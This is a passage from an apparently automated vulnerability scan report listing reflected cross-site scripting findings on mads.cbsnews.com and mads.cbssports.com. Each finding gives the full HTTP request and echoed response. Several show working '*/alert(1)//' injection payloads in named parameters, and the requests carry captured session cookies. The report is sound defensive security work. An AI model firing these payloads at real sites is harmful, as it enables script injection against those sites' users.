Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the PTYPE request parameter is copied into the HTML document as plain text between tags. The payload ac12f<a>57637cec6c was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100ac12f<a>57637cec6c&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml?tag=stack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; XCLGFbrowser=Cg8JIk24ijttAAAASDs; __utmb=37725042; __utmc=37725042; __utma=37725042.1876633410.1303946274.1303946274.1303946274.1; __utmz=37725042.1303946284.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:23:04 GMT
Server: Apache/2.2
Content-Length: 616
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:23:04 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100ac12f<a>57637cec6c&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-A
...[SNIP]...

3.566. http://mads.cbsnews.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload 5de7c<a>983c4f9e64c was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=1625de7c<a>983c4f9e64c&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:18:29 GMT
Server: Apache/2.2
Content-Length: 569
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:18:29 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=1625de7c<a>983c4f9e64c&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS:
...[SNIP]...

3.567. http://mads.cbsnews.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into a JavaScript inline comment. The payload 74f50*/alert(1)//b2587e15043 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=16274f50*/alert(1)//b2587e15043&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=34303121&ADREQ&SP=110&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:16 GMT
Server: Apache/2.2
Content-Length: 662
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:19:16 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=16274f50*/alert(1)//b2587e15043&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=34303121&ADREQ&SP=110&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS
...[SNIP]...

3.568. http://mads.cbsnews.com/mac-ad [cookiesOn parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the cookiesOn request parameter is copied into the HTML document as plain text between tags. The payload 47155<a>6d9080192c6 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=147155<a>6d9080192c6&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml?tag=stack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; XCLGFbrowser=Cg8JIk24ijttAAAASDs; __utmb=37725042; __utmc=37725042; __utma=37725042.1876633410.1303946274.1303946274.1303946274.1; __utmz=37725042.1303946284.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:23:48 GMT
Server: Apache/2.2
Content-Length: 601
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:23:48 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=147155<a>6d9080192c6&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE
...[SNIP]...

3.569. http://mads.cbsnews.com/mac-ad [cookiesOn parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the cookiesOn request parameter is copied into a JavaScript inline comment. The payload f9777*/alert(1)//3f99a3c6646 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1f9777*/alert(1)//3f99a3c6646&DVAR_INSTLANG=en-US&x-cb=51611017&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:58 GMT
Server: Apache/2.2
Content-Length: 615
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:19:58 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1f9777*/alert(1)//3f99a3c6646&DVAR_INSTLANG=en-US&x-cb=51611017&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='2000' NCAT='100:' CID='0' TO BEACON TEXT) */;window.CBSI_PA
...[SNIP]...

3.570. http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ad30d<a>62c7ad0eca6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1&ad30d<a>62c7ad0eca6=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml?tag=stack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; XCLGFbrowser=Cg8JIk24ijttAAAASDs; __utmb=37725042; __utmc=37725042; __utma=37725042.1876633410.1303946274.1303946274.1303946274.1; __utmz=37725042.1303946284.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:26:18 GMT
Server: Apache/2.2
Content-Length: 603
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:26:18 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1&ad30d<a>62c7ad0eca6=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='2100' NCAT='205:' CID='' TO BEACON TEXT) *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw7.cnet
...[SNIP]...

3.571. http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload d86d4*/alert(1)//e3159ee20e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=51611017&ADREQ&beacon=1&cookiesOn=1&d86d4*/alert(1)//e3159ee20e=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:20:14 GMT
Server: Apache/2.2
Content-Length: 618
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:20:14 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=51611017&ADREQ&beacon=1&cookiesOn=1&d86d4*/alert(1)//e3159ee20e=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='2000' NCAT='100:' CID='0' TO BEACON TEXT) */;window.CBSI_PAGESTATE='1|78|;cbsnews.com;;|';/* MAC [r20101202-0915-v1-13
...[SNIP]...

3.572. http://mads.cbsnews.com/mac-ad [x-cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the x-cb request parameter is copied into a JavaScript inline comment. The payload 6c5aa*/alert(1)//3a95f77bcea was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=516110176c5aa*/alert(1)//3a95f77bcea&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:20:03 GMT
Server: Apache/2.2
Content-Length: 616
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:20:03 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=516110176c5aa*/alert(1)//3a95f77bcea&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='2000' NCAT='100:' CID='0' TO BEACON TEXT) */;window.CBSI_PAGESTATE='1|78|;cbsnews.com;;|';/*
...[SNIP]...

3.573. http://mads.cbsnews.com/mac-ad [x-cb parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the x-cb request parameter is copied into the HTML document as plain text between tags. The payload 18b91<a>fb7d5f8494 was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=6024675318b91<a>fb7d5f8494&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml?tag=stack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; XCLGFbrowser=Cg8JIk24ijttAAAASDs; __utmb=37725042; __utmc=37725042; __utma=37725042.1876633410.1303946274.1303946274.1303946274.1; __utmz=37725042.1303946284.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:24:52 GMT
Server: Apache/2.2
Content-Length: 599
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:24:52 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=6024675318b91<a>fb7d5f8494&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='2100' NCAT='205:' CID='' TO BEACON TEXT) *//* MAC [r20101202-0915-v1-
...[SNIP]...

3.574. http://mads.cbssports.com/mac-ad [ADREQ&SP parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the ADREQ&SP request parameter is copied into the HTML document as plain text between tags. The payload 6e8e8<a>8f9b1d6ec6 was submitted in the ADREQ&SP parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=806e8e8<a>8f9b1d6ec6&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}; last_access=1303947378; fsr.a=1303947389291

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:41:29 GMT
Server: Apache/2.2
Content-Length: 686
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:41:29 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=806e8e8<a>8f9b1d6ec6&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBSSPORTS' BRAND='59' SITE='175' SP='8068889166' CNET-PTYPE='10' POS='100' NCAT='22052:22135:' CNET-PARTNER-ID='1' DVA
...[SNIP]...

3.575. http://mads.cbssports.com/mac-ad [ADREQ&beacon parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload e5ea6<a>be9fa511e02 was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1e5ea6<a>be9fa511e02&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:09:22 GMT
Server: Apache/2.2
Content-Length: 556
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:09:22 GMT

